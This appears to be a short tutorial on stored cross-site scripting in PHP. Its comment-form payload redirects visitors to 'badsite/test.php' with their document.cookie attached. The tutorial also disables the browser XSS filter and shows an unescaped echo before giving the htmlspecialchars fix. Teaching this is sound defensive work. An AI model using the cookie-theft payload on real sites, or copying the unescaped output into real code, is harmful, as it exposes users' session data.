


XSS

This attack works only if the application fails to escape output.
 
# Browsers have some XSS protection;
# we need to disable it for this test example.

<?php
// Demo only: asks browsers that still implement the legacy XSS filter to turn
// it off so the example below is not blocked. Most current browsers no longer
// ship that filter, so escaping output is the actual defense.
header('X-XSS-Protection:0');
?>

<script>
    // Writes one cookie through document.cookie.
    //   c_name - cookie name, used as given
    //   value  - cookie value, passed through escape() before storing
    //   exdays - optional lifetime in days; when omitted no "expires"
    //            attribute is added and the cookie lasts for the session
    // NOTE(review): escape() is a legacy function; it is kept here so the
    // stored values stay exactly as the example expects.
    function setCookie(c_name, value, exdays) {
        var expiry = new Date();
        expiry.setDate(expiry.getDate() + exdays);

        var cookieValue = escape(value);
        if (exdays != null) {
            cookieValue += "; expires=" + expiry.toUTCString();
        }

        document.cookie = c_name + "=" + cookieValue;
    }
    // Simulated login state for the demo. Cookies written from script cannot
    // carry the HttpOnly flag, so any script running on the page can read them
    // through document.cookie.
    setCookie('username', 'john'); // Logged user data in Cookie
    setCookie('email', 'john@yahoo.com');
</script>

# A user submits a malicious comment

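<form method="POST">
    <!-- Demo: the textarea is pre-filled with what a malicious user would type.
         The form itself is not the flaw; the flaw is printing the submitted
         comment back into a page without escaping it. -->
    Add a comment: 
    <textarea name="comment">
        <script> 
            document.location = 
                "badsite/test.php?cookies="+ document.cookie; // Look Here
        </script>
    </textarea>
    <input type="submit" name="btn_submit"/>
</form>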
The submitted comment is displayed to other logged-in users.
 
# Redirects to badurl?cookies=username=john&email=john@yahoo.com
# and exposes the logged-in user's private data

# Wrong! The submitted comment is written into the page as-is,
# so the browser parses any markup it contains, including <script> tags.
echo $_POST['comment']; // Look Here

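# Correct: escape at output time, for the HTML context the value is printed into.
# htmlspecialchars() turns < > & " ' into entities, so a submitted <script>
# tag is shown as text instead of being run by the browser.
# FILTER_SANITIZE_STRING is deprecated as of PHP 8.1; it strips tags from the
# input and is not a substitute for escaping output.
echo htmlspecialchars($_POST['comment'] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');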


